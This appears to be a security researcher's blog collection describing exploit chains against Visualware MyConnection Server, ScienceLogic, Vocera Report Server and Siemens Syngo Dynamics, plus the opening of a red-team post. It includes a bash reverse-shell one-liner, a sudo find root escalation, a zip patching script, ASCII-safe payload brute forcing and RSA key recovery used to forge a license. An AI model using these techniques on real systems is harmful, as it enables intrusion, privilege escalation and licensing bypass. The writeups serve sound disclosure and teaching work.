CVE-2021-27198

This article is in no way affiliated, sponsored, or endorsed with/by Visualware, Inc. All graphics are being displayed under fair use for the purposes of this article.

Revisiting an Old Bug: File Upload to Code Execution

A colleague recently contacted me about a bug I discovered a couple of years ago (CVE-2021-27198). The vulnerability was an unauthenticated arbitrary file upload issue in versions 11.0 to 11.0b of the Visualware MyConnection Server software. At the time I hadn’t actually proven remote code execution even though I rated it as critical. So when my colleague asked me how I exploited it, I felt like I had to show it was possible. This endeavor proved to be both challenging and enlightening, so I thought I’d share the experience.

The MyConnection Server software is written in Java and intended to work seamlessly across different platforms. In this case, the arbitrary file write was privileged, since the server runs with elevated permissions: SYSTEM on Windows and root on Linux. With a privileged file write, achieving code execution is often straightforward. This post by Doyensec outlines the most common approaches, which can be broadly categorized into two groups: web application-specific and operating system-specific. Web application-specific methods involve seeking ways to initiate execution within the web server process. Examples include uploading web framework configuration files or web application source code. On the other hand, operating system-specific techniques involve finding execution triggers controlled by the operating system itself, such as services, scheduled tasks, cron jobs, and so on.

Regrettably, in the case of this particular bug, I cannot directly target the web server itself since it’s a pure Java implementation, as opposed to running on a standalone web server like Apache or Nginx. As a result, our focus will primarily shift toward operating system-specific possibilities or more innovative approaches.

Windows RCE

With this in mind, I began researching possible techniques for achieving code execution solely through a file write. In the Windows environment, my usual strategy would involve targeting vulnerable applications susceptible to traditional DLL hijacking or phantom DLL hijacking, leveraging the privilege granted by such writes.

I opened up the Sysinternals Procmon tool and began looking for “NAME NOT FOUND” or “PATH NOT FOUND” results for CreateFile operations. I usually look for instances of executables or DLLs. While looking through the results, I noticed that every minute the MCS Java process was attempting to open several “rtaplugin” JAR files, some of which did not exist.

Based on the output, it looks like the server is dynamically loading these JARs from disk into the Java process. If this is the case, I may be able to get arbitrary code execution by simply placing a custom JAR file in a specific place on the file system. I decided to open up the MCS JAR in JD-GUI to investigate.

When I searched for “rtaplugin”, I found a class named RTAPlugin with a function that appears to load a file from disk, create a custom ClassLoader, load a class from the file, and then create a new instance of that class. This is exactly what I need!

To confirm execution, I created a simple POC that executes calc.exe when an instance of the class is created.

I then just manually copied the JAR into the appropriate directory to see if it was loaded. I was thrilled to see that it worked! Now I just needed to test it using the file upload vulnerability.

I loaded up Burp and pasted in the JAR file as the body of the file upload request. Unfortunately, when I sent it over, I didn’t see calc.exe in the process list.

When I opened up the log file for the MyConnection server, I found the following exception was thrown when attempting to unzip the JAR.

I took the original JAR payload and diffed it against the one that was uploaded into the rtaplugin directory. I found that certain bytes were getting corrupted. I opened up JD-GUI again to take a closer look at the code that performed the file write.

What wasn’t immediately obvious (at least to me) was that an implied encoding/decoding was happening with the calls to String.valueOf and String.getBytes. As a result, certain ranges of bytes were getting corrupted. On Windows, I found that bytes between 0x80 and 0x9f were being replaced with other values. This meant I had to do some bit fiddling to get the payload to work.
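
To see why this kind of round trip is lossy, here’s a quick Python analogue (an illustration only, not the server’s code; cp1252 stands in for whatever default charset the JVM selected on the target):

    # cp1252 leaves 0x81, 0x8d, 0x8f, 0x90, and 0x9d undefined, so those
    # bytes cannot survive a decode/encode round trip intact.
    raw = bytes(range(0x80, 0xA0))
    cooked = raw.decode("cp1252", errors="replace").encode("cp1252", errors="replace")
    print(raw.hex())     # 808182...9f
    print(cooked.hex())  # undefined positions come back as 0x3f ('?')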

After doing a little bit of googling, I found a CTF writeup by Yudai Fujiwara that faced a similar encoding problem. The writeup provided code for generating a zip file that only contained bytes in the ASCII range, 0x0 – 0x7f. The script primarily focused on two structures in the zip format that needed to be free of non-ASCII bytes: the CRCs of the zipped files and any length fields.

The script brute-forces a valid ASCII value for the CRC field by iteratively modifying the inner file. In the CTF challenge, the zip contained an ASCII script, whereas a JAR contains a binary class file. I updated the algorithm to make a similar modification to the Java source and then recompile the Java class file on each iteration so the CRC updates.

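A minimal sketch of that recompile-and-check loop follows. The file names and javac invocation are placeholders, and the full script (modeled on Fujiwara’s) also has to keep the zip length fields ASCII-safe and store the entry uncompressed:

    import itertools
    import subprocess
    import zlib

    def ascii_safe(data: bytes) -> bool:
        # every byte must fall in the ASCII range 0x00-0x7f
        return all(b < 0x80 for b in data)

    # Append a throwaway comment to the Java source and recompile until the
    # resulting class file happens to have an all-ASCII CRC32.
    template = open("Payload.java.tmpl").read()
    for i in itertools.count():
        with open("Payload.java", "w") as f:
            f.write(template + f"\n// nonce {i}\n")
        subprocess.run(["javac", "Payload.java"], check=True)
        crc = zlib.crc32(open("Payload.class", "rb").read())
        if ascii_safe(crc.to_bytes(4, "little")):
            print(f"ASCII-safe CRC 0x{crc:08x} after {i + 1} tries")
            break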

After creating the ASCII-zip payload, I uploaded it using the vulnerable endpoint. As hoped, it was loaded and executed as SYSTEM on the target server. To keep from having to recompile a JAR to execute different commands, I generated a JAR that executes a script at a known location. I could then separately upload that script with a new command whenever I wanted command execution. I added the “setExecutable” directive to ensure it worked on Linux as well.

Linux RCE

When dealing with Linux-based operating systems, one of the primary challenges in exploiting arbitrary file write vulnerabilities is ensuring that file permissions are correctly configured. Even if a file is executed, it won’t function if it isn’t marked as executable. To overcome this obstacle, I targeted files that already had the execute bit set.

As I had anticipated, demonstrating exploitation on Linux turned out to be quite straightforward by simply overwriting scripts within the /etc/cron.* directories. On Red Hat distributions, you can achieve relatively timely execution by overwriting the /etc/cron.hourly/0anacron script. The drawback to targeting cron jobs is there is no guarantee specific scripts exist, and overwriting them can cause system instability.

Assuming outbound network connectivity isn’t blocked, a simple reverse shell is likely the simplest payload to put in the cron job (an example follows below). If that doesn’t work, the cron job can be modified to contain a base64-encoded copy of the unmodified rtaplugin JAR that is then copied to the correct directory. The same technique described above can then be used to get repeated code execution by uploading different versions of the script to /tmp/b.bat.
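
For the reverse shell, the classic bash one-liner is usually enough (the IP and port here are placeholders for the attacker’s listener):

    bash -i >& /dev/tcp/192.0.2.10/4444 0>&1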

No License, No Wurk!

After all the effort put into developing the rtaplugin exploit, I was disappointed to find out that rtaplugins (and the associated thread that loads them periodically) are only active when the web server has a valid license. I wasn’t aware of this because my test instance was still within its trial phase. I decided to take another look and see if our privileged file write vulnerability (CVE-2021-27198) could be used once again, but this time to trick the server into thinking it is licensed. The hope here is to find a file or database entry that can be modified with our file upload exploit to bypass licensing. To be clear, nothing described here can be used to subvert or crack the license for this software on a fully patched system. The goal is to use our already privileged file system access to bypass any license checks.

When you navigate to the web application home page, you’ll see a menu on the left that contains a link to “Licensing”. It’s safe to assume this is the right place to look.

Sadly, when you click on it, you’re presented with the login page. If you’re fortunate and the password for the admin user hasn’t been changed, the next page you’ll encounter is shown below.

If you’ve made it this far, or happen to guess some credentials, you will have sufficient permissions to access the server licensing endpoint. There’s not much to go on regarding the format of the expected key, other than the hint that it starts with MCS.

I opened up the JAR again and tracked down the code responsible for handling the license activation. The handler performs a series of checks and transforms before making a web request to a Visualware domain to verify the license.

If that fails (by exception), the server then attempts to validate the license by sending a specially crafted DNS request.

Leveraging the privileged file write capability of CVE-2021-27198, there are several methods at my disposal for circumventing the licensing without having to decipher the licensing key directly. As the software initiates a network request to validate the entered key, it can be rerouted to a server under my control to authenticate the supplied key.

The most straightforward method to achieve this is by modifying the hosts file, which contains mappings of IP addresses to hostnames and is typically the first location an operating system checks when resolving a hostname’s IP address. On Windows systems, you can find this file at C:\Windows\System32\drivers\etc\hosts, and on *nix systems, it’s located at /etc/hosts. To manipulate the license verification process, I can simply insert a new entry into the hosts file, directing the license server domain to the IP address of a server under my control.
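
For illustration, a single entry like the following does the job (the IP is a stand-in for the attacker’s server, and the hostname is a hypothetical stand-in for the real licensing domain):

    192.0.2.10    licensing.visualware.com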

An alternative approach, specific to *nix systems, involves altering the /etc/resolv.conf file, which specifies the DNS server’s IP address used for domain resolution. By changing the DNS server address to a server that I manage, I can ensure that any DNS requests for the license server are resolved to my fake license server’s IP address.

WARNING: It should be noted that overwriting the /etc/hosts or /etc/resolv.conf file can cause system instability if existing configurations depend on custom DNS entries or resolvers.

My next step is to trace the activate function back to the web endpoint that can trigger it. Unfortunately, it appears the key entered into the web form is not in the same format as what is sent to the license server. After performing a couple of string-based checks, a validate function is called on the provided license key. If you look at the function closely, it may look familiar: it appears to implement a handcrafted version of RSA.

From a security standpoint, the rationale behind requiring an encrypted license key as the input to the web application doesn’t make sense. First and foremost, since the decrypted license key is subsequently transmitted over the network in plaintext, it can easily be captured with a tool like Wireshark. Secondly, the actual license key is verified on the vendor’s server, so deducing how the license key is generated is impractical anyway. Unfortunately for me, however, this introduced a minor obstacle in reaching the network activation function detailed in the previous section.

The astute reader may have already noticed an interesting detail about the RSA parameters. That public key looks awfully small: just barely over 256 bits. It appears our CTF challenge continues… (oh wait, this is real software).

For those imposters in the infosec community that claim playing CTFs doesn’t provide real-world experience, I can confidently say you’ve never hunted real bugs. All too often I come across exploit chains that appear as if someone neatly set up each primitive for me to uncover. I personally don’t spend a ton of time attempting crypto challenges when playing CTFs, mostly because I’m not smart enough. Luckily for me, this example fits nicely into the “baby’s first” category. With such a small public key, I should be able to find a CTF writeup that guides me through factoring it into its two primes. A few searches later I found an article by Dennis Yurichev that demonstrates using a tool called CADO-NFS to do just that. After about 5 minutes I was presented with the answer.

With the two primes in hand, I attempted to reconstruct the private key using the script provided in Yurichev’s post. Unfortunately, the RSA crypto libraries in Python didn’t play well with the recovered primes, mainly because the key size rounded up to 257 bits and the libraries complained about truncation. I also discovered that the server’s custom RSA implementation didn’t implement padding. To get around these issues, I wrote code to perform the calculations manually rather than using a crypto library.

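The math involved is simple enough to do with Python’s built-in pow(). A minimal sketch of the manual approach (the actual p, q, and public exponent recovered from the factorization are omitted here):

    # Textbook (unpadded) RSA using the factors recovered with CADO-NFS.
    # pow(e, -1, phi) requires Python 3.8+.
    def derive_private_exponent(p: int, q: int, e: int) -> int:
        phi = (p - 1) * (q - 1)
        return pow(e, -1, phi)  # modular inverse of e mod phi(n)

    def raw_rsa(data: bytes, exponent: int, n: int) -> bytes:
        m = int.from_bytes(data, "big")
        assert m < n, "input must be smaller than the modulus"
        c = pow(m, exponent, n)  # straight modular exponentiation, no padding
        return c.to_bytes((n.bit_length() + 7) // 8, "big")

    # Usage sketch (values redacted):
    #   n = p * q
    #   d = derive_private_exponent(p, q, e)
    #   blob = raw_rsa(license_key_bytes, d, n)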

I used my script to generate an encrypted blob with the derived RSA private key and fired off a web request with the finished license key. Keep in mind, since I’ve already overwritten the hosts file, I only need to pass the decryption checks, as the key will not be transmitted to the vendor’s server for verification. To my delight, it works!

Conclusion

My journey to developing a working exploit for CVE-2021-27198 finally comes to an end. What started as a simple exercise turned into quite an endeavor. For anyone interested, I’ve uploaded my exploit here.

ScienceLogic Dumpster Fire

This article is in no way affiliated, sponsored, or endorsed with/by ScienceLogic, Inc. All graphics are being displayed under fair use for the purposes of this article.

Just another Day

During a penetration test for a client last year, our team identified a noteworthy target that piqued our interest. A screenshot of the website appeared in our scan findings.

After a brief investigation, we found a page that provided a clear overview of the web application’s potential function and its default credentials.

The default credentials for the phpMyAdmin server on port 8008 were also provided. This detail becomes crucial later, as it grants the ability to directly modify records within the application database.

Regrettably, the system owner had not updated the default passwords, allowing us to access the system. Immediately noticeable was a menu named “Device Toolbox.” We started examining the parameters provided to these tools, as they frequently have command injection vulnerabilities due to inadequate input filtering.

After trying different payloads in the request fields, the following screen appeared as we navigated through the tool wizard.

Having demonstrated command execution, we swapped the payload for a reverse shell callback and launched it. This granted us shell access to the server. Considering the simplicity of uncovering this initial command injection vulnerability, we believed there might be more similar flaws. Now, with system access, we can observe process creation events using one of our preferred tools, Pspy. As expected, four additional command injection vulnerabilities were identified by exercising various endpoints in the web application and monitoring process creation events in Pspy. An example is illustrated below.

Having access to the file system, we proceeded to examine the web application’s source code. This would make identifying vulnerabilities simpler than through blackbox testing. However, when we tried to view the PHP files, they seemed to be indecipherable.

What about root?

Given our inability to access the web application’s source code, we shifted our focus toward pinpointing potential paths for privilege escalation to root. We uploaded and ran LinPeas on the system to identify any potential privilege escalation vulnerabilities. While LinPeas didn’t reveal anything of particular use, a copy of the sudoers file was located in one of the backup folders on the file system. It listed several applications that could be executed as root, without a password, that have known privilege escalation capabilities.

The find command is one of my go-tos after running across this article years ago. Running the following command will execute the listed command as root on the system.

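The invocation was almost certainly the classic GTFOBins-style one; swap /bin/sh for whatever command you want run as root:

    sudo find . -exec /bin/sh \; -quit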

Having gained root privileges, we could now revisit the web application and hopefully find a way to review the source code for vulnerabilities.

Let’s briefly diverge to discuss the DMCA and the laws surrounding the circumvention of copyright protections. I bring this up because even basic encoding or encryption of source code might be viewed as a method to safeguard copyright. This could potentially hinder security researchers from examining the source code for vulnerabilities. Fortunately, recent updates to Title 37 of the Code of Federal Regulations effectively grant security researchers an exemption if the work is done under the auspices of good-faith security research. Given that we are red teamers performing good-faith security research, securing our customers against critical vulnerabilities, we clearly fall under this exemption.

We took a look at the PHP configuration and noticed a custom module was being used to load each source file. Analyzing the module in IDA Pro, it appears to be a simple function that decrypts the file with a static AES-256 key and then decompresses the output with zlib. Nothing fancy here.

Running this algorithm against the garbled source does the trick and we end up with normal looking PHP.

Beware what’s inside!!!

With access to the source code, we started scrutinizing it for more serious vulnerabilities. We had previously observed a command injection bug where the command was saved in the database and subsequently fetched and executed. This prompted us to search for potential SQL injection vulnerabilities, which might be escalated to remote code execution. As we examined the application endpoints, we discovered what seemed like systematic SQL injection issues. After pinpointing roughly 20 SQL injection vulnerabilities, we chose to conclude our search. A few examples are provided below.

Having identified a combined 25 command injection and SQL injection vulnerabilities we decided to stop bug hunting and reach out to the vendor to begin the disclosure process.

Vendor Disclosure & Patch

We’d love to say responsibly disclosing the vulnerabilities we discovered went smoothly, but it was easily the worst we’ve experienced. What follows is presented as a comical list of signs that responsible disclosure is probably going to go bad. In reality, all of these things happened during this one disclosure.

  • The vendor has no public vulnerability disclosure policy

  • The vendor has no security related email contacts listed on their website

  • The vendor Twitter account refuses to give you a security contact after you explain you want to disclose a security vulnerability.

  • After spamming vendor emails harvested from OSINT, the only response you get is from a random engineer. Fortunately, he forwards the email to the security director.

  • The security director refuses to accept your report, and instead points you to a portal to submit a ticket.

  • After signing up for the ticketing portal, you find that you can’t submit a ticket unless you are a customer.

  • When you notify the company that you can’t submit a ticket unless you are a customer, they tell you to have your customer submit the report.

  • When you send the report anyway, encrypted and hosted on a trusted website, they refuse to open it because they claim it could be a phish.

  • Individuals from the vendor reach out to arbitrary contacts in your customer’s organization to report you for unusual, possibly malicious behavior.

  • Upon verification of your identity by multiple individuals in your customer’s organization, they agree to open the results but go silent for weeks.

  • You receive an email from @zerodaylaw (no seriously) saying they will be representing the vendor going forward in the disclosure process.

  • The law firm has no technical questions about the vulnerabilities themselves, but instead about behavior surrounding post-exploitation and why this software was “targeted”.

  • After multiple, unresponsive, follow-up emails with both the law firm & the vendor about coordinating with @MITREcorp to get CVEs reserved, you get an email asking to meet in person, that very week.

  • In the follow-up phone call (after declining to meet in person), the vendor claims most of the bugs were “features” or in “dead code”.

  • The primary focus of the call with the vendor is how we “got” the company’s code and not the vulnerability details.

  • The vendor claims that meeting the 90-day public disclosure deadline is unlikely and, given their customer base, they have no estimate on when public disclosure could happen.

  • After the phone call, the vendor sends an email asking questions focused on exact times, people, authorizations, and details surrounding the vulnerability coordination with @MITREcorp.

  • Lawyers from the vendor contact your customer’s organization requesting copies of all correspondence with @MITREcorp.

From the list, it’s evident that the interaction ranged from being challenging to outright hostile. However, there was a silver lining: Securifera opted to pursue the status of a CVE numbering authority (CNA). Obtaining CNA status enables an organization to reserve and disclose CVEs more conveniently.

In the last email correspondence with the vendor, nearly 9 months ago, the security director asserted that the vulnerabilities were addressed. However, they remained reluctant to proceed with CVE issuance. Considering the extensive duration that has transpired, we opted to independently proceed with CVE issuance and disclosure. As a result, the vulnerabilities we identified are logged as CVE-2022-48580 through CVE-2022-48604. We hope the aforementioned list can act as a guide for vendors on practices to avoid in the realm of responsible vulnerability disclosure. For vendors looking for a good reference on how to properly run a coordinated vulnerability disclosure program, the smart people at Carnegie Mellon put together the following guide to assist.

Vocera Report Server Pwnage

This article is in no way affiliated, sponsored, or endorsed with/by Vocera Communications or Stryker Corporation. All graphics are being displayed under fair use for the purposes of this article.

Quest for RCE

Last year during a routine penetration test, our team came across an interesting target called Vocera Report Server while reviewing web endpoint screenshots.

A little research revealed that the “Vocera Report Server software and the associated report console interface provide administrators, managers, and decision makers the ability to monitor system performance and generate reports for analysis” for the Vocera Communication System. When we click on the “Vocera Report Console” link we are greeted with the following login page.

Step 1: Head over to Google to see if we can find any documentation that might list default credentials for the application. As luck would have it, this page comes up and kindly tells us what the default password is.

Fortunately the system owner didn’t change the password and we log right in. Once inside we start perusing the various endpoints to get a feel for what the application is used for. Right off, the first thing that stands out is the menu that is named “Task Scheduler”. Clicking on the menu brings up a panel that appears to let you create tasks that will be executed.

After tinkering with the various tasks, it appears we can only edit existing tasks. We also can’t seem to get arbitrary command execution or injection by modifying the existing entries. At this point we decided it would likely be more fruitful to move on to a white box approach and see what the code is actually doing. We reached out to a colleague to get us access to the server using some credentials they had cracked after pulling the hash with Responder.

Since the application is written in Java, we open up the class files in JD-GUI to begin analyzing the function responsible for executing tasks. The first issue we notice is that the function that parses the user-controlled task execFileName attempts to retrieve the filename portion of the path by searching for the last occurrence of a backslash. Unfortunately for the developers, Java on Windows also accepts forward slashes as directory separators in file paths. This means we can use forward slashes to traverse out of the intended directory without tripping the backslash check.

While the path to the executable task is controllable, a check is performed that ensures the file’s contents contain the word “java” before executing it. This means that if we can control the contents of a file on disk, we can execute arbitrary commands.

How then do we get a file on disk that we control? What if we can affect the log file? It looks like if an exception happens when executing the task, a log entry is created.

Sure enough, if we specify a task execFileName that doesn’t exist, an entry is created in the log file that also includes the task parameters, into which we can inject arbitrary data. With a little creativity, we are able to inject arbitrary commands and then point to the log file using the directory traversal to achieve remote code execution.

Can we do better?

With a path to execute arbitrary commands identified, we shifted our focus to finding a way to accomplish the same thing but without having to authenticate first. While investigating the task execution code in the previous exercise, we noticed there is a websocket interface that the web server communicates with when executing a task. After some testing it was determined that this interface was unauthenticated. In addition to the “runTaskPage” function mentioned above, there are a few other operations that appear to be related to database management functions that are worth investigating.

If we look at the code for the restoreSqlData operation we see that it executes a bat file that in turn executes another Java JAR. Inside that JAR, the function that handles the restoreSqlData operation parses the “uploadFile” parameter and appends it to the local “backupDir”. This instance is also vulnerable to directory traversal like the one mentioned previously.

The specified file is expected to be a zip file that is then programmatically unzipped and written to disk. The problem, as you could probably guess, is that the unzip function is vulnerable to directory traversal, which can lead to an arbitrary file write. If the unzip succeeds, a particular file is read from the archive that is then used to completely overwrite the database. DANGER: THIS OPERATION OVERWRITES THE DATABASE SO ADDITIONAL MEASURES NEED TO BE TAKEN TO PREVENT THIS.

Since this server hosts a web server and is running as SYSTEM, an arbitrary file write can be used to achieve remote code execution by writing a webshell in the webroot. To summarize, in this instance we have found an unauthenticated endpoint that allows for a privileged file write if we can place an arbitrary file somewhere on the file system. We lack one more primitive to pull off this exploit. Back to the code!

Given the specific requirement for a file write, we search for any references to “write” and work our way back to any web endpoints that would reach that code. This concept is often referred to as source-to-sink data flow analysis. After some time we find a class called MultipartRequest. This class is instantiated from an incoming multipart/form-data request. If the request contains any multipart parameters with a filename, the data is read and written to a file in a temp folder.

If we search for references to RequestContainer, the class responsible for creating MultipartRequest instances, we see it is created by the BaseController class on the handling of each HTTP request. Since BaseController is an abstract class, we search for any child classes and find ReportController. This is perfect since ReportController is the primary endpoint for the application. This means if we send an HTTP request with Content-Type multipart/form-data to the ReportController endpoint, the contents of any parameters with a Content-Disposition that contains a filename will be written to disk in a temp directory. The best part is this is all unauthenticated (another bug)!
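
A rough sketch of that upload step in Python. The endpoint path is a placeholder; the detail that matters is the multipart part carrying a filename in its Content-Disposition:

    # Unauthenticated write-to-temp via a multipart upload (sketch).
    import requests

    with open("payload.zip", "rb") as f:
        # requests emits Content-Disposition: form-data; name="file"; filename="payload.zip"
        files = {"file": ("payload.zip", f, "application/octet-stream")}
        r = requests.post("https://target/console/ReportController",  # hypothetical path
                          files=files, verify=False)
    print(r.status_code)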

Now we have all the pieces necessary to construct an exploit chain to gain unauthenticated remote code execution on the Vocera Report Server. First, we construct a malicious zip file with an embedded webshell using a directory traversal path. Next, we upload the zip file to the temp directory with a multipart request. Finally, we send a websocket request with the restoreSqlData operation and a directory traversal path pointing to our uploaded zip file.

WAIT!!!  HOW DO I NOT CLOBBER THE DATABASE?!?!

As much as any customer likes red teamers proving exploitation, nuking an application’s database is probably not a reasonable loss to prove code execution. That means we needed to put a little more effort into the exploit to avoid this. If we look at the SQL restore function, we can see that if a ZipException is thrown (that is not a version issue), the function will bail out.

How then do we cause a ZipException while also successfully executing our arbitrary file write? If we look at the JDK source code for ZipInputStream, we can see a simple way to cause a ZipException to be thrown for a specific ZipEntry. If we set the first bit of the flag field in the ZipEntry, a ZipException will be thrown since encryption is not supported.

If we look up the offset for LOCFLG, we see it is at index 6 in the ZipEntry header. We can code up some Python to modify the zip entry contents after we zip up our payload, as shown below.

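A sketch of that patch. The decoy entry name is hypothetical; it just needs to sit after the webshell entry so the file write happens before the exception aborts the restore:

    import struct

    LOCSIG = b"PK\x03\x04"  # local file header signature
    LOCFLG = 6              # offset of the general purpose bit flag

    def set_encryption_bit(zip_bytes: bytes, entry_name: bytes) -> bytes:
        # Set bit 0 (the "encrypted" flag) on one entry's local header so
        # java.util.zip.ZipInputStream throws a ZipException when it hits it.
        data = bytearray(zip_bytes)
        off = 0
        while (off := data.find(LOCSIG, off)) != -1:
            name_len = struct.unpack_from("<H", data, off + 26)[0]
            name = bytes(data[off + 30 : off + 30 + name_len])
            if name == entry_name:
                flags = struct.unpack_from("<H", data, off + LOCFLG)[0]
                struct.pack_into("<H", data, off + LOCFLG, flags | 0x1)
            off += 4
        return bytes(data)

    # "poison.txt" is a hypothetical decoy entry placed after the webshell.
    patched = set_encryption_bit(open("payload.zip", "rb").read(), b"poison.txt")
    open("patched.zip", "wb").write(patched)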

Vendor Disclosure & Patch

I reported these issues through the Stryker vulnerability disclosure program and can say everything went smoothly; they worked with us to get the issues fixed and patched in a reasonable time frame. Given the severity of these findings, we strongly encourage anyone that has Vocera Report Server deployed to update to the latest version immediately. For tracking purposes, the vulnerabilities discussed here represent CVE-2022-46898, CVE-2022-46899, CVE-2022-46900, CVE-2022-46901, and CVE-2022-46902.

Attacking .NET Web Services

This article is in no way affiliated, sponsored, or endorsed with/by Siemens Healthineers or Microsoft Corporation. All graphics are being displayed under fair use for the purposes of this article.

Last year I spent some time looking for vulnerabilities in a commercial cardiovascular imaging web application called  Syngo Dynamics. This product is developed by Siemens Healthineers. Syngo Dynamics is a rather complex application that consists of a web application, .NET web services, native binaries, and a database.

For the purposes of this blog post, I’m going to focus on the web services portion of the application. I gave a BSIDES talk on this topic for those that may prefer that format. The remainder of this post will detail my approach when performing white-box vulnerability research on a .NET web application. The first thing I like to do is open up the IIS config and any “web.config” files for the application. The IIS config can be found at “C:\Windows\System32\inetsrv\config” and the “web.config” files are typically in the app pool directories with a format similar to “<Drive Letter>\inetpub\temp\appPools\<App Name>\web.config“.

When performing white-box vulnerability research, my primary goal is to locate the code so I can look for bugs. There are two important things we can take away from these config files to further this effort. The “application” node defines the mapping of the application endpoint to the physical path on disk where the code exists. The “endpoint” node inside the “service” node specifies the class contract that defines the endpoint behavior. If we navigate to the “physicalPath” for the “DataTransferServices” we find “svc” files that describe each service.

If we look at the contents of the “CommonService.svc” file, we can see that the assembly that implements this service is called DataTransferServices and the service name is DataTransferServices.CommonService. At this point we need to locate the assembly to begin the reverse engineering process. But what is an assembly?

In .NET, an assembly is the compiled unit of deployment: a .dll or .exe containing IL code and metadata. So we’re looking for an assembly named “DataTransferServices.exe” or “DataTransferServices.dll”, likely in the same directory tree. If we do a quick search in Explorer we find what we are looking for.

Now that the assembly has been located, it’s time to open up the binary in a decompiler. Since the binary is a managed C# assembly, we can decompile it back into readable C# code. There are two tools I like to use for this, dotPeek & dnSpy. They are mostly feature equivalent, with the exception of dnSpy also providing debugging capabilities.

Opening up the “DataTransferServices.dll” binary, we find the contract interface that defines the functions exposed through the service. In dnSpy we select “Go to Implementation” to view the code for one of the functions.

One of the first things that jumped out at me is the concatenation of user-controlled parameters into the file path that is then read and returned in the response. Praetorian wrote up an interesting article about abusing the Path.Combine function in C#. Basically, if an absolute path is given as a later parameter, the earlier ones are ignored. To confirm this suspicion, I needed to craft a web request to hit this code. The first thing I did was navigate to the service endpoint in a browser to see what it displayed.
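
Python’s ntpath.join implements the same documented Windows semantics, so it makes for a quick illustration of the pitfall (an analogy only, not the application’s code):

    import ntpath

    # A rooted second argument silently discards the base directory.
    print(ntpath.join("C:\\app\\reports", "summary.pdf"))
    # -> C:\app\reports\summary.pdf
    print(ntpath.join("C:\\app\\reports", "C:\\Windows\\win.ini"))
    # -> C:\Windows\win.ini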

It looks like the metadata output is disabled. Unfortunately without metadata output enabled we won’t be able to easily generate sample web requests for the web service endpoints. Luckily the webpage tells us how to enable it inside the “web.config” file for the web service. After making the modification we are greeted with a slightly different landing page.

The service endpoint shows a link to a new “wsdl” endpoint that describes the functions published by the service. Unfortunately, without something to ingest it, the “wsdl” XML file isn’t very useful. Fortunately, Burp has an extension called Wsdler that was made for this very purpose. If we navigate to the “wsdl” endpoint we can then right click on the request in the Burp Proxy -> HTTP history tab and send it to the Wsdler extension.

Using Wsdler you can select the operation in the list and it will generate a sample HTTP SOAP request. The request can then be sent to the Repeater tab to test out. I enter the full path in the “fileName” field to confirm the ability to read arbitrary files using the Path.Combine function.

Our suspicion was correct. We successfully read an arbitrary file rather than a file in the intended directory. Oftentimes it isn’t this simple, and having the ability to debug the code is pivotal. In the next section, I’ll walk through how to do that using dnSpy.

Debugging .NET web services using dnSpy and dotPeek

To begin debugging a .NET web service, we need to locate the IIS w3wp.exe process. Click the Debug -> Attach to Process menu in dnSpy to bring up the process selection dialog. If no w3wp.exe process exists, send a web request to the web service to ensure a worker process is created.

If the w3wp.exe process still isn’t listed, there could be an architecture mismatch between dnSpy and the IIS worker process. It is important to ensure the architectures of dnSpy, the .NET assembly, and the IIS worker process are all the same. The architecture of the IIS process can be modified in the Advanced Settings of the IIS Application Pool.

Once you attach to the w3wp.exe process you should be able to drop breakpoints in the decompiled source that will get hit when the code executes. If you drop a breakpoint and the circle is an outline rather than filled-in, you have one more step to complete. This means that the debugger could not find symbols for the application you are debugging.

In this case we can use dotPeek to generate the symbols for the assembly. Simply open the assembly in dotPeek, right click on the assembly in the “Assembly Explorer” and click Generate Pdb.

After the PDB has been generated, copy the file into the same directory as the assembly that is being debugged and it should be automatically loaded. Restart the debugger and begin stepping through the code.

As shown in the screenshot above, I can confirm at the code level using the debugger that Path.Combine does indeed allow for the opening of arbitrary file paths if one of the arguments is absolute.

Finding Variants

With the discovery of one misuse of the Path.Combine function resulting in an arbitrary file read, it makes sense to search the rest of the code base for additional instances that may have more impact. Since this vulnerability isn’t particularly complex, I chose to use grepWin to search for other uses of Path.Combine whose arguments may be controllable.

Reviewing the results led to the discovery of a similar usage of Path.Combine but this time as a file write. The impact of an arbitrary file write is often more critical as it typically allows for code execution.

Ultimately, an additional 7 instances of exploitable insecure Path.Combine usage were identified. These findings fell into three vulnerability categories: arbitrary file read, arbitrary file write, and server-side request forgery (SSRF). I will leave exploitation of these vulnerability types as an exercise for the reader as this is a pretty well documented topic. For some examples feel free to watch my BSIDES Charleston 2022 talk.

Vendor Disclosure & Patch

I reported these issues through the Siemens Healthineers vulnerability disclosure process and can say everything went smoothly; they worked with me to get the issues fixed and patched in a reasonable time frame. Given the severity of these findings, we strongly encourage anyone that has Syngo Dynamics deployed to update to the latest version immediately. More details about the vulnerabilities can be found on the Siemens Healthineers security advisory page.

Operation Eagle Eye

This article is in no way affiliated, sponsored, or endorsed with/by Fidelis Cybersecurity. All graphics are being displayed under fair use for the purposes of this article.

Who remembers that movie from about 15 years ago called Eagle Eye? A supercomputer has access to massive amounts of data, AI gets introduced, and things go to crap. Reflecting back on that movie, I find myself more interested in what a hacker could actually do with that kind of access than in the AI bit. This post is about what I did when I got that kind of access on a customer red team engagement.

Being a network defender is hard. You’re constantly trying to balance usability, security, and privacy. Add too much security and users complain they can’t get their job done. Not enough and you open yourself up to being hacked by every script kiddie on the internet. How does user privacy fit in? Well, as a network defender your first grand idea to protect the network against adversaries might be to implement some form of network traffic inspection. This might have worked 20 years ago, but now most network protocols at least support some form of encryption to protect users’ data from prying eyes. If only there were a way to decrypt it, inspect it, and then encrypt it again… Let’s call it break and inspect.

The graphic above was pulled from an NSA article warning about break and inspect and the risks introduced by its usage (I’d be inclined to heed the warning since the NSA are likely experts on this particular topic). The most obvious risk introduced by break and inspect is clearly the device(s) performing the decryption and inspection. Compromise of these devices would provide an attacker access to all unencrypted traffic traversing the network.

All of this lead-up was meant to describe what I can only assume happened with one of our customers. After years of assessments, I noticed one day that all outbound web traffic now had a custom CA certificate when visiting websites. This was a somewhat natural progression, as we had been utilizing domain fronting for some time to evade network detection. In response, the network defenders implemented break and inspect to identify traffic with conflicting HTTP Host headers. As a red teamer, my almost immediate thought was: what if we could get access to the break-and-inspect device? Being able to sift through all unencrypted web traffic on a large network would be a goldmine. Operation Eagle Eye began…

Enumeration

After no small amount of time, we identified what we believed to be the device(s) responsible for performing the break-and-inspect operation on the network. We found the F5 BIG-IP device that was listed as the hostname on the CA certificate, a Fidelis Network CommandPost, and several HP iLO management web services in the same subnet. For those that aren’t familiar, Fidelis Cybersecurity sells a network appliance suite that can perform traffic inspection and modification. They also just so happen to be listed as an accredited product on the NSA recommended National Information Assurance Partnership (NIAP) website, so I assume it’s super-secure-hackproof 😉

